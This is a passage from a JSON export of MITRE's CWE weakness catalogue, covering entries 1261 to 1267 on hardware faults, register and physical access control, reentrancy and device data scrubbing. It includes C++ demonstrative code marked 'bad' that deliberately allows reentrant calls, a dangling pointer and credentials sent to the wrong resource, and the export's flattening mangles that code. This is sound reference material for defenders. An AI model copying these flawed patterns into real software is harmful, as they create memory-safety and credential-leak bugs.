Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"suggested content improvements"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"suggested observed examples"}]}},"1261":{"attr":{"@_ID":"1261","@_Name":"Improper Handling of Single Event Upsets","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware logic does not effectively handle when single-event upsets (SEUs) occur.","Extended_Description":{"xhtml:p":"Technology trends such as CMOS-transistor down-sizing, use of \\n            new materials, and system-on-chip architectures continue to increase the \\n            sensitivity of systems to soft errors. These errors are random, and \\n            their causes might be internal (e.g., interconnect coupling) or external \\n            (e.g., cosmic radiation). These soft errors are not permanent in nature \\n            and cause temporary bit flips known as single-event upsets (SEUs). \\n            SEUs are induced errors in circuits caused when charged particles lose \\n            energy by ionizing the medium through which they pass, leaving behind a \\n            wake of electron-hole pairs that cause temporary failures. If these \\n            failures occur in security-sensitive modules in a chip, it might \\n            compromise the security guarantees of the chip. For instance, these \\n            temporary failures could be bit flips that change the privilege of\\n\\t    a regular user to root."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1254","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Implement triple-modular redundancy around security-sensitive modules."}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"SEUs mostly affect SRAMs.  For SRAMs storing security-critical data, implement Error-Correcting-Codes (ECC) and Address Interleaving."}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This is an example from [REF-1089].  See the reference for full details of this issue.","Body_Text":"Parity is error detecting but not error correcting.","Example_Code":[{"#text":"Due to single-event upsets, bits are flipped in memories.  As a result, memory-parity checks fail, which results in restart and a temporary denial of service of two to three minutes.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Using error-correcting codes could have avoided the restart caused by SEUs.","attr":{"@_Nature":"good","@_Language":"Other"}}]},{"Intro_Text":"In 2016, a security researcher, who was also a patient using a pacemaker, was on an airplane when a bit flip occurred in the pacemaker, likely due to the higher prevalence of cosmic radiation at such heights. The pacemaker was designed to account for bit flips and went into a default safe mode, which still forced the patient to go to a hospital to get it reset. The bit flip also inadvertently enabled the researcher to access the crash file, perform reverse engineering, and detect a hard-coded key. [REF-1101]"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1086"}},{"attr":{"@_External_Reference_ID":"REF-1087"}},{"attr":{"@_External_Reference_ID":"REF-1088"}},{"attr":{"@_External_Reference_ID":"REF-1089"}},{"attr":{"@_External_Reference_ID":"REF-1090"}},{"attr":{"@_External_Reference_ID":"REF-1091"}},{"attr":{"@_External_Reference_ID":"REF-1101"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"}}},"1262":{"attr":{"@_ID":"1262","@_Name":"Improper Access Control for Register Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers.","Extended_Description":{"xhtml:p":"Software commonly accesses peripherals in a System-on-Chip (SoC) or other device through a memory-mapped register interface. Malicious software could tamper with any security-critical hardware data that is accessible directly or indirectly through the register interface, which could lead to a loss of confidentiality and integrity."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may be exploited if the register interface design does not adequately protect hardware assets from software."},{"Phase":"Implementation","Note":"Mis-implementation of access control policies may inadvertently allow access to hardware assets through the register interface."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Read Application Data","Modify Memory","Modify Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Unexpected State","Alter Execution Logic"],"Note":"Confidentiality of hardware assets may be violated if the protected information can be read out by software through the register interface. Registers storing security state, settings, other security-critical data may be corruptible by software without correctly implemented protections."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This is applicable in the Architecture phase before implementation started. Make sure access policy is specified for the entire memory map. Manual analysis may not ensure the implementation is correct.","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":"Registers controlling hardware should have access control implemented. This access control may be checked manually for correct implementation. Items to check consist of how are trusted parties set, how are trusted parties verified, how are accesses verified, etc. Effectiveness of a manual analysis will vary depending upon how complicated the interface is constructed.","Effectiveness":"Moderate"},{"Method":"Simulation / Emulation","Description":"Functional simulation is applicable during the Implementation Phase. Testcases must be created and executed for memory mapped registers to verify adherence to the access control policy. This method can be effective, since functional verification needs to be performed on the design, and verification for this weakness will be included. There can be difficulty covering the entire memory space during the test.","Effectiveness":"Moderate"},{"Method":"Formal Verification","Description":"Formal verification is applicable during the Implementation phase. Assertions need to be created in order to capture illegal register access scenarios and prove that they cannot occur. Formal methods are exhaustive and can be very effective, but creating the cases for large designs may be complex and difficult.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Information flow tracking can be applicable during the Implementation phase. Security sensitive data (assets) - for example, as stored in registers - is automatically tracked over time through the design to verify the data doesn\'t reach illegal destinations that violate the access policies for the memory map. This method can be very effective when used together with simulation and emulation, since detecting violations doesn\'t rely on specific scenarios or data values. This method does rely on simulation and emulation, so testcases must exist in order to use this method.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Manual documentation review of the system memory map, register specification, and permissions associated with accessing security-relevant functionality exposed via memory-mapped registers.","Effectiveness":"Moderate"},{"Method":"Fuzzing","Description":"Perform penetration testing (either manual or semi-automated with fuzzing) to verify that access control mechanisms such as the memory protection units or on-chip bus firewall settings adequately protect critical hardware registers from software access.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design proper policies for hardware register access from software."},{"Phase":"Implementation","Description":"Ensure that access control policies for register access are implemented in accordance with the specified design."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The register interface provides software access to hardware functionality. This functionality is an attack surface. This attack surface may be used to run untrusted code on the system through the register interface. As an example, cryptographic accelerators require a mechanism for software to select modes of operation and to provide plaintext or ciphertext data to be encrypted or decrypted as well as other functions. This functionality is commonly provided through registers.","Example_Code":[{"#text":"Cryptographic key material stored in registers inside the cryptographic accelerator can be accessed by software.","attr":{"@_Nature":"bad"}},{"#text":"Key material stored in registers should never be accessible to software. Even if software can provide a key, all read-back paths to software should be disabled.","attr":{"@_Nature":"good"}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-2915","Description":"virtualization product does not restrict access to debug and other processor registers in the hardware, allowing a crash of the host or guest OS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2915"},{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2020-12446","Description":"Driver exposes access to Model Specific Register (MSR) registers, allowing admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12446"},{"Reference":"CVE-2015-2150","Description":"Virtualization product does not restrict access to PCI command registers, allowing host crash from the guest.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2150"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"},"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods and observed examples"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-12","Contribution_Comment":"Provided detection methods"}]}},"1263":{"attr":{"@_ID":"1263","@_Name":"Improper Physical Access Control","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas.","Extended_Description":"Sections of a product intended to have restricted access may be inadvertently or intentionally rendered accessible when the implemented physical protections are insufficient. The specific requirements around how robust the design of the physical protection mechanism needs to be depends on the type of product being protected. Selecting the correct physical protection mechanism and properly enforcing it through implementation and manufacturing are critical to the overall physical security of the product.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1191","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1243","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness can arise if design decisions are made that do not align with the intended physical protection of the product"},{"Phase":"Manufacturing","Note":"While the architecture and design phase of the product may have accurately met the intended robustness for product physical protections, this phase may introduce the weakness through errors in physically manufacturing the product."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Specific protection requirements depend strongly on contextual factors including the level of acceptable risk associated with compromise to the product\'s protection mechanism. Designers could incorporate anti-tampering measures that protect against or detect when the product has been tampered with."},{"Phase":"Testing","Description":"The testing phase of the lifecycle should establish a method for determining whether the protection mechanism is sufficient to prevent unauthorized access."},{"Phase":"Manufacturing","Description":"Ensure that all protection mechanisms are fully activated at the time of manufacturing and distribution."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"401"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-05-28"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Physical Protection Mechanism","attr":{"@_Date":"2020-08-20"}}}},"1264":{"attr":{"@_ID":"1264","@_Name":"Hardware Logic with Insecure De-Synchronization between Control and Data Channels","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete.","Extended_Description":{"xhtml:p":"Many high-performance on-chip bus protocols and processor data-paths employ separate channels for control and data to increase parallelism and maximize throughput. Bugs in the hardware logic that handle errors and security checks can make it possible for data to be forwarded before the completion of the security checks. If the data can propagate to a location in the hardware observable to an attacker, loss of data confidentiality can occur. \'Meltdown\' is a concrete example of how de-synchronization between data and permissions checking logic can violate confidentiality requirements. Data loaded from a page marked as privileged was returned to the cpu regardless of current privilege level for performance reasons. The assumption was that the cpu could later remove all traces of this data during the handling of the illegal memory access exception, but this assumption was proven false as traces of the secret data were not removed from the microarchitectural state."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1037","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The weakness can be introduced in the data transfer or bus protocol itself or in the implementation."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Thoroughly verify the data routing logic to ensure that any error handling or security checks effectively block illegal dataflows."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"There are several standard on-chip bus protocols used in modern SoCs to allow communication between components. There are a wide variety of commercially available hardware IP implementing the interconnect logic for these protocols. A bus connects components which initiate/request communications such as processors and DMA controllers (bus masters) with peripherals which respond to requests. In a typical system, the privilege level or security designation of the bus master along with the intended functionality of each peripheral determine the security policy specifying which specific bus masters can access specific peripherals.  This security policy (commonly referred to as a bus firewall) can be enforced using separate IP/logic from the actual interconnect responsible for the data routing.","Example_Code":[{"#text":"The firewall and data routing logic becomes de-synchronized due to a hardware logic bug allowing components that should not be allowed to communicate to share data. For example, consider an SoC with two processors. One is being used as a root of trust and can access a cryptographic key storage peripheral. The other processor (application cpu) may run potentially untrusted code and should not access the key store. If the application cpu can issue a read request to the key store which is not blocked due to de-synchronization of data routing and the bus firewall, disclosure of cryptographic keys is possible.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"All data is correctly buffered inside the interconnect until the firewall has determined that the endpoint is allowed to receive the data.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-5754","Description":"Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"233"}},{"attr":{"@_CAPEC_ID":"663"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1265":{"attr":{"@_ID":"1265","@_Name":"Unintended Reentrant Invocation of Non-reentrant Code Via Nested Calls","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During execution of non-reentrant code, the software performs a call that unintentionally produces a nested invocation of the non-reentrant code.","Extended_Description":"In complex software, a single function call may lead to many different possible code paths, some of which may involve deeply nested calls. It may be difficult to foresee all possible code paths that could emanate from a given function call. In some systems, an external actor can manipulate inputs to the system and thereby achieve a wide range of possible control flows. This is frequently of concern in software that executes script from untrusted sources. Examples of such software are web browsers and PDF readers. A weakness is present when one of the possible code paths resulting from a function call alters program state that the original caller assumes to be unchanged during the call.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"663","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"416","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Likelihood":"Unknown","Note":"Exploitation of this weakness can leave the application in an unexpected state and cause variables to be reassigned before the first invocation has completed. This may eventually result in memory corruption or unexpected code execution."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting a system that will execute untrusted code in response to events, consider executing the untrusted event handlers asynchronously (asynchronous message passing) as opposed to executing them synchronously at the time each event fires. The untrusted code should execute at the start of the next iteration of the thread\u2019s message loop. In this way, calls into non-reentrant code are strictly serialized, so that each operation completes fully before the next operation begins. Special attention must be paid to all places where type coercion may result in script execution. Performing all needed coercions at the very beginning of an operation can help reduce the chance of operations executing at unexpected junctures.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Make sure the code (e.g., function or class) in question is reentrant by not leveraging non-local data, not modifying its own code, and not calling other non-reentrant code.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The implementation of the Widget class in the following C++ code is an example of code that is not designed to be reentrant. If an invocation of a method of Widget inadvertently produces a second nested invocation of a method of Widget, then data member backgroundImage may unexpectedly change during execution of the outer call.","Example_Code":{"attr":{"@_Language":"C++","@_Nature":"bad"},"xhtml:div":{"#text":"class Widget{}class Image{}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"Image* backgroundImage;","attr":{"@_style":"margin-left:10px;"}},{"#text":"void click(){}void changeBackgroundImage(Image* newImage){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"if (backgroundImage){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"backgroundImage-&gt;click();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"if (backgroundImage){}backgroundImage = newImage;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"delete backgroundImage;","attr":{"@_style":"margin-left:10px;"}}}]}],"xhtml:br":""},{"#text":"public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"void click(){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"scriptEngine-&gt;fireOnImageClick();/* perform some operations using \u201cthis\u201d pointer */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}]}},"Body_Text":"Looking closer at this example, Widget::click() calls backgroundImage-&gt;click(), which in turn calls scriptEngine-&gt;fireOnImageClick(). The code within fireOnImageClick() invokes the appropriate script handler routine as defined by the document being rendered. In this scenario this script routine is supplied by an adversary and this malicious script makes a call to Widget::changeBackgroundImage(), deleting the Image object pointed to by backgroundImage. When control returns to Image::click, the function\u2019s \\"backgroundImage \\"this\\" pointer (which is the former value of backgroundImage) is a dangling pointer. The root of this weakness is that while one operation on Widget (click) is in the midst of executing, a second operation on the Widget object may be invoked (in this case, the second invocation is a call to different method, namely changeBackgroundImage) that modifies the non-local variable."},{"Intro_Text":"This is another example of C++ code that is not designed to be reentrant.","Example_Code":{"attr":{"@_Language":"C++","@_Nature":"bad"},"xhtml:div":{"#text":"class Request{}","xhtml:br":"","xhtml:div":{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"std::string uri;/* ... */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"void setup(ScriptObject* _uri){}void send(ScriptObject* _data){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"this-&gt;uri = scriptEngine-&gt;coerceToString(_uri);/* ... */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Credentials credentials = GetCredentials(uri);std::string data = scriptEngine-&gt;coerceToString(_data);doSend(uri, credentials, data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}],"xhtml:br":""}}},"Body_Text":"The expected order of operations is a call to Request::setup(), followed by a call to Request::send(). Request::send() calls scriptEngine-&gt;coerceToString(_data) to coerce a script-provided parameter into a string. This operation may produce script execution. For example, if the script language is ECMAScript, arbitrary script execution may result if _data is an adversary-supplied ECMAScript object having a custom toString method. If the adversary\'s script makes a new call to Request::setup, then when control returns to Request::send, the field uri and the local variable credentials will no longer be consistent with one another. As a result, credentials for one resource will be shared improperly with a different resource. The root of this weakness is that while one operation on Request (send) is in the midst of executing, a second operation may be invoked (setup)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-1772","Description":"In this vulnerability, by registering a malicious onerror handler, an adversary can produce unexpected re-entrance of a CDOMRange object. [REF-1098]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1772"},{"Reference":"CVE-2018-8174","Description":"This CVE covers several vulnerable scenarios enabled by abuse of the Class_Terminate feature in Microsoft VBScript. In one scenario, Class_Terminate is used to produce an undesirable re-entrance of ScriptingDictionary during execution of that object\u2019s destructor. In another scenario, a vulnerable condition results from a recursive entrance of a property setter method. This recursive invocation produces a second, spurious call to the Release method of a reference-counted object, causing a UAF when that object is freed prematurely. This vulnerability pattern has been popularized as \u201cDouble Kill\u201d. [REF-1099]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1098"}},{"attr":{"@_External_Reference_ID":"REF-1099"}}]},"Content_History":{"Submission":{"Submission_Name":"Simon Zuckerbraun","Submission_Organization":"Trend Micro","Submission_Date":"2018-12-20"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"}}},"1266":{"attr":{"@_ID":"1266","@_Name":"Improper Scrubbing of Sensitive Data from Decommissioned Device","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned.  A scrubbing capability could be missing, insufficient, or incorrect.","Extended_Description":{"xhtml:p":"When a product is decommissioned - i.e., taken out of service - best practices or regulatory requirements may require the administrator to remove or overwrite sensitive data first, i.e. \\"scrubbing.\\"  Improper scrubbing of sensitive data from a decommissioned device leaves that data vulnerable to acquisition by a malicious actor. Sensitive data may include, but is not limited to, device/manufacturer proprietary information, user/device credentials, network configurations, and other forms of sensitive data."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Policy"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Functionality to completely scrub data from a product at the conclusion of its lifecycle should be part of the design phase. Trying to add this function on top of an existing architecture could lead to incomplete removal of sensitive information/data."}},{"Phase":"Policy","Description":{"xhtml:p":"The manufacturer should describe the location(s) where sensitive data is stored and the policies and procedures for its removal. This information may be conveyed, for example, in an Administrators Guide or a Statement of Volatility."}},{"Phase":"Implementation","Description":{"xhtml:p":"If the capability to wipe sensitive data isn\'t built-in, the manufacturer may need to provide a utility to scrub sensitive data from storage if that data is located in a place which is non-accessible by the administrator. One example of this could be when sensitive data is stored on an EEPROM for which there is no user/admin interface provided by the system."}}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}},{"attr":{"@_CAPEC_ID":"546"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1080"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-05-28"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"}}},"1267":{"attr":{"@_ID":"1267","@_Name":"Policy Uses Obsolete Encoding","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an obsolete encoding mechanism to implement access controls.","Extended_Description":{"xhtml:p":"Within a System-On-a-Chip (SoC), various circuits and hardware engines generate transactions for the purpose of accessing (read/write) assets or performing various actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (identifying the originator of the transaction) and a destination identity (routing the transaction to the respective entity). Sometimes the transactions are qualified with a Security Token. This Security Token helps the destination agent decide on the set of allowed actions (e.g., access to an asset for reads and writes). A policy encoder is used to map the bus transactions to Security Tokens that in turn are used as access-controls/protection mechanisms. A common weakness involves using an encoding which is no longer trusted, i.e., an obsolete encoding."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Modify Files or Directories","Read Files or Directories","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["Security Token Decoders should be reviewed for design inconsistency and common weaknesses.","Access and programming flows should be tested in both pre-silicon and post-silicon testing."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["For example, consider a system that has four bus masters. The table below provides bus masters, their Security Tokens, and trust assumptions.","The policy encoding is to be defined such that Security Token will be used in implemented access-controls. The bits in the bus transaction that contain Security-Token information are Bus_transaction [15:11]. The assets are the AES-Key registers for encryption or decryption. The key of 128 bits is implemented as a set of four, 32-bit registers.","Below is an example of a policy encoding scheme inherited from a previous project where all \\"ODD\\" numbered Security Tokens are trusted."],"xhtml:table":[{"xhtml:tr":[{"xhtml:th":["Bus Master","Security Token Decoding","Trust 